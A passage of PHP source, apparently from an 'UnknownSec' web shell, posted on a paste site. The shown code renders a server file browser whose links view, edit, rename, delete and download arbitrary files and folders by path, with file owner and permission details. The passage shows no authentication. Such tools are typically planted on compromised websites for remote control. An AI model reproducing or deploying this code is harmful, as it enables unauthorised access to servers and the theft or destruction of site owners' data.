			&lt;td class='text-center'&gt;
			&lt;div class='btn-group'&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path/$dir&amp;action=rename_folder'&gt;&lt;i class='bi bi-pencil-fill'&gt;&lt;/i&gt;&lt;/a&gt;&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path/$dir&amp;action=delete_folder'&gt;&lt;i class='bi bi-trash-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;/div&gt;
			&lt;/td&gt;
		&lt;/tr&gt;&quot;;
		}
		foreach($scand as $file){
			$ft = date(&quot;Y-m-d G:i&quot;, filemtime(&quot;$path/$file&quot;));
			if(function_exists('posix_getpwuid')) {
				$fowner = @posix_getpwuid(fileowner(&quot;$path/$file&quot;));
				$fowner = $fowner['name'];
			} else {
				$fowner = fileowner(&quot;$path/$file&quot;);
			}
			if(function_exists('posix_getgrgid')) {
				$fgrp = @posix_getgrgid(filegroup(&quot;$path/$file&quot;));
				$fgrp = $fgrp['name'];
			} else {
				$fgrp = filegroup(&quot;$path/$file&quot;);
			}
			if(!is_file($path.'/'.$file)) continue;
			if(strlen($file) &gt; 25) {
				$_f = substr($file, 0, 25).&quot;...-.&quot;.$ext;		
			}else{
				$_f = $file;
			}
		echo &quot;
		&lt;tr&gt;
		&lt;td&gt;&lt;i class='bi bi-file-earmark-text-fill'&gt;&lt;/i&gt;&lt;a class='text-decoration-none text-secondary' href='?dir=$path&amp;action=view&amp;opn=$file'&gt;$_f&lt;/a&gt;&lt;/td&gt;
			&lt;td class='text-center'&gt;file&lt;/td&gt;
			&lt;td class='text-center'&gt;$ft&lt;/td&gt;
			&lt;td class='text-center'&gt;&quot;.sz(filesize($file)).&quot;&lt;/td&gt;
			&lt;td class='text-center'&gt;$fowner&lt;gr&gt;/&lt;/gr&gt;$fgrp&lt;/td&gt;
			&lt;td class='text-center'&gt;&quot;;
			if(is_writable($path.'/'.$file)) echo '&lt;gr&gt;';
			elseif(!is_readable($path.'/'.$file)) echo '&lt;rd&gt;';
				echo p($path.'/'.$file);
			if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '&lt;/gr&gt;&lt;/rd&gt;&lt;/td&gt;';
			echo &quot;
			&lt;td class='text-center'&gt;
			&lt;div class='btn-group'&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=view&amp;opn=$path/$file'&gt;&lt;i class='bi bi-eye-fill'&gt;&lt;/i&gt;&lt;/a&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=edit&amp;opn=$path/$file'&gt;&lt;i class='bi bi-pencil-square'&gt;&lt;/i&gt;&lt;/a&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=rename&amp;opn=$path/$file'&gt;&lt;i class='bi bi-pencil-fill'&gt;&lt;/i&gt;&lt;/a&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=delete_file&amp;opn=$path/$file'&gt;&lt;i class='bi bi-trash-fill'&gt;&lt;/i&gt;&lt;/a&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=download&amp;opn=$path/$file'&gt;&lt;i class='bi bi-download'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;/div&gt;
			&lt;/td&gt;
		&lt;/tr&gt;&quot;;
		}
		?&gt;
		&lt;/tbody&gt;
		&lt;/table&gt;
		&lt;/div&gt;&lt;div class='text-secondary'&gt;&amp;copy; 2020-&lt;?=date('Y');?&gt; UnknownSec&lt;/div&gt;
	&lt;/div&gt;
&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;

Private - Private paste aren't shown in recent listings.

Delete After - When should we delete your paste?

Spam protection -

Reply to "Untitled"